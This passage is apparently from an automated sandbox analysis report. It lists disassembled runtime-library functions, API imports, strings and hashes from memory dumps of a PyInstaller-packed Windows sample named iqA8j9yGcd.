FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB30D
FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB33A
FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB34B
FlsSetValue.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB35C
SetLastError.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB377

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction ID: 7dd93b0f0dd6dec08d94767eb59df598974f52cb0e48a81d7a46474b68c4072d
Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction Fuzzy Hash: 69112F20E0C68281F594B7A95D9113DE1C6DF44BB0F944734F83E46AF6DE3CB4214B60

Function 00007FF8BA243AEC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

EncodePointer.KERNEL32 ref: 00007FF8BA243B5C
_CallSETranslator.LIBVCRUNTIME ref: 00007FF8BA243BA7
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA243DD5

Strings

MOC, xrefs: 00007FF8BA243B70
RCC, xrefs: 00007FF8BA243B78

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 8f0da28b834415bf94a2588a677a7c1d22b03c176692cab6c1aa6134d6a9ba6e
Instruction ID: 2a5694c3bbfe940d762452da5a459a336ad868491417c3a4d2b01e22d842af83
Opcode Fuzzy Hash: 8f0da28b834415bf94a2588a677a7c1d22b03c176692cab6c1aa6134d6a9ba6e
Instruction Fuzzy Hash: 39917073A08B928AE711CB69E4402ED7BA1FB44BC8F14416AEF8D17B55DF38D195DB00

Function 00007FF8BA24BF40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C1E0

Strings

volatile , xrefs: 00007FF8BA24BFA7, 00007FF8BA24C0D8
std::nullptr_t, xrefs: 00007FF8BA24C199
volatile, xrefs: 00007FF8BA24BFB6, 00007FF8BA24C0E7
std::nullptr_t , xrefs: 00007FF8BA24C170

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: a4b8fa5738cb077c0dd1c715c93faa489c025e3a231d02453c6ff42b09dc2204
Instruction ID: 042166aab5d01268563f99ac2068334af1f486ccc03b48f8fec37eb7193cf448
Opcode Fuzzy Hash: a4b8fa5738cb077c0dd1c715c93faa489c025e3a231d02453c6ff42b09dc2204
Instruction Fuzzy Hash: 957166B2A08A4394EB148F2CDA401B867A0BF05BC4F4445B5DF5E92BA8DF3DE660E740

Function 00007FF8BA2438D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

EncodePointer.KERNEL32 ref: 00007FF8BA24391C
_CallSETranslator.LIBVCRUNTIME ref: 00007FF8BA24396B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA243AE3

Strings

RCC, xrefs: 00007FF8BA243939
MOC, xrefs: 00007FF8BA243930

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 57666f04986205aaeb6cec4485343161f235cd4bd3cca67b34c3d672c94bd25f
Instruction ID: d03e82f713b955aa851bbf36ec8faca8cc7ed8885606b50da8b072ae872205ce
Opcode Fuzzy Hash: 57666f04986205aaeb6cec4485343161f235cd4bd3cca67b34c3d672c94bd25f
Instruction Fuzzy Hash: DC612732A08B868AE724CF69E5803AD77A0FB44B98F144266EF4D17B99CF78E155D700

Function 00007FF72B8D2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72B8D1B6A), ref: 00007FF72B8D295E

Strings

Error [ANSI Fallback], xrefs: 00007FF72B8D29FF
[PYI-%d:ERROR] , xrefs: 00007FF72B8D2966
Error, xrefs: 00007FF72B8D2A0E
%s: %s, xrefs: 00007FF72B8D29E8

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 33aaa48c0c91ebb6dfbbba63d980213a5a7fc2a835c8d297aef11ee6c8bdf438
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: C331DB22B1868552E710BB69AC416F7A295FF887D4FC00132FE8D43765DF3CD5568B50

Function 00007FF72B8D2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B8D23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF72B8D248E
DeleteObject.GDI32 ref: 00007FF72B8D24C1
DestroyIcon.USER32 ref: 00007FF72B8D24D3

Strings

Unhandled exception in script, xrefs: 00007FF72B8D23F8

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction ID: e25e8fcfb432db3032e6a5bc61b84787809d64111eb3d8b05a55e5655311b60d
Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction Fuzzy Hash: B4316072A19A8285EB20FF65EC552F9A360FF88784FC40135EA4D4BB69DF3CD1108B50

Function 00007FF72B8D2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF72B8D918F,?,00007FF72B8D3C55), ref: 00007FF72B8D2BA0
MessageBoxW.USER32 ref: 00007FF72B8D2C2A

Strings

Warning, xrefs: 00007FF72B8D2C1D
[PYI-%d:%ls] , xrefs: 00007FF72B8D2BA8
WARNING, xrefs: 00007FF72B8D2BAF

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 71273d836411571436c019b95e5ad3107ae263c804c6a16fc89bdfd6ac682109
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: CA21B762718B4192E710AB68F8447EAB364FB88780FC04136EE8D57769DF3CD265CB90

Function 00007FF72B8D2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF72B8D1B99), ref: 00007FF72B8D2760

Strings

Error [ANSI Fallback], xrefs: 00007FF72B8D27CF
Error, xrefs: 00007FF72B8D27DE
ERROR, xrefs: 00007FF72B8D276F
[PYI-%d:%s] , xrefs: 00007FF72B8D2768

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: fc655f3a984e4cc5569e066657e27bd404062653d72a00d4e79cba1335422aee
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 53218672A1878252E710AB65F8417E6A394FF88384FC40136FE8C53669DF7CD1558B90

Function 00007FF72B8E9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF72B8E9AAD
GetProcAddress.KERNEL32 ref: 00007FF72B8E9AC3
FreeLibrary.KERNEL32 ref: 00007FF72B8E9AEA

Strings

mscoree.dll, xrefs: 00007FF72B8E9AA4
CorExitProcess, xrefs: 00007FF72B8E9ABC

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: e7dfc1446436b434f69b4257e862406d958fe4680787e7309bb4541aff1b9f78
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 10F06261B0970681EB10AB6CEC8477AA360EF95761FD40635D6AE461F4DF7CE094CBA0

Function 00007FF8BA24A360 Relevance: 7.6, APIs: 5, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8BA24A3D9
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A3FB
DName::DName.LIBVCRUNTIME ref: 00007FF8BA24A40A
DName::DName.LIBVCRUNTIME ref: 00007FF8BA24A441
DName::DName.LIBVCRUNTIME ref: 00007FF8BA24A44C

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 1d3f62f49c0834609423dd0bd46333a683c0de2f358683d99f687fb4e9606eea
Instruction ID: 6eb748ba19db0226c56ed6be093fa0bfdc85b9427112d7005b194259518d7e2d
Opcode Fuzzy Hash: 1d3f62f49c0834609423dd0bd46333a683c0de2f358683d99f687fb4e9606eea
Instruction Fuzzy Hash: 1D416422A18B9694FB10CB2AD9510BC3BA4BB15FC4B9884B2EF5D53795EF3CE405E300

Function 00007FF72B8F9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF72B8F9390
_set_statfp.LIBCMT ref: 00007FF72B8F93AB
_set_statfp.LIBCMT ref: 00007FF72B8F93C7
_set_statfp.LIBCMT ref: 00007FF72B8F9403

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 86662515fef83e8067973afb840218032993b2e678d8b732adafa7eabb9124a8
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 0D118622D5CA0342F668315DEC913799050EFB9368EC41634EB6E166F6CE6CF46149A0

Function 00007FF72B8EB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB3AF
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB3CE
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB3F6
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB407
FlsSetValue.KERNEL32(?,?,?,00007FF72B8EA5A3,?,?,00000000,00007FF72B8EA83E,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EB418

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction ID: 9c2bcc81fad4e9e143f834db83f79e7ef9ffbeafd5c977b2feb725a144c26812
Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction Fuzzy Hash: 7C113020E0C68281F994B7AD5D91179A181DF447B0FC88734F97D46AF6DE3CB4614BB1

Function 00007FF72B8EB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF72B8EB235
FlsSetValue.KERNEL32 ref: 00007FF72B8EB254
FlsSetValue.KERNEL32 ref: 00007FF72B8EB27C
FlsSetValue.KERNEL32 ref: 00007FF72B8EB28D
FlsSetValue.KERNEL32 ref: 00007FF72B8EB29E

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction ID: 88f1864a2d05e61338ca521d7423f8f1d1d4686fa595a605810bd861c8364a1b
Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction Fuzzy Hash: DA11C820E0D68781F998B2A94C91179A181CF45770F948B34F93D4A6F2DE3CB8624FB1

Function 00007FF72B8E5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E5FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E6106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E61BC

Strings

verbose, xrefs: 00007FF72B8E5FB0

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 09e5629e392cd5cb505caf64b4db7816cc877186c9c1e02955734397f286f18b
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: E691C232A0868681F761AEA8DC5037DB791EB40B94FC44136FA5D473E7DE3CE4258BA1

Function 00007FF72B8EFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EFEA7

Part of subcall function 00007FF72B8E7A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E7A59

Strings

UTF-8, xrefs: 00007FF72B8EFE26
ccs, xrefs: 00007FF72B8EFDE2
UTF-16LEUNICODE, xrefs: 00007FF72B8EFE45

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 4e49bebfe95fc6cef8ff843a9ebeb1a11cfff322ad80b036607b6a543e333378
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 2E81C772E0C1C385F7647FAD8900278BAA0EB15B44FD54035EA0D972B5DB2DF9219FA1

Function 00007FF8BA244288 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244407

Strings

csm, xrefs: 00007FF8BA244441
, xrefs: 00007FF8BA244358
csm, xrefs: 00007FF8BA2442D7

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: 041b58f3de5196c69b124c2ba61789f4a272a12b531fce9fd61be4661d159c18
Instruction ID: a88a37cdb5a34d5ee471ea541d9321b708b17c8ef91752c7e95f3b9452af7180
Opcode Fuzzy Hash: 041b58f3de5196c69b124c2ba61789f4a272a12b531fce9fd61be4661d159c18
Instruction Fuzzy Hash: FD71907290869287DB608F29D0606B9BBA0FB44FC9F148176DF4E47A89CF3CE591DB41

Function 00007FF72B8DD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B8DD673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF72B8DD70A
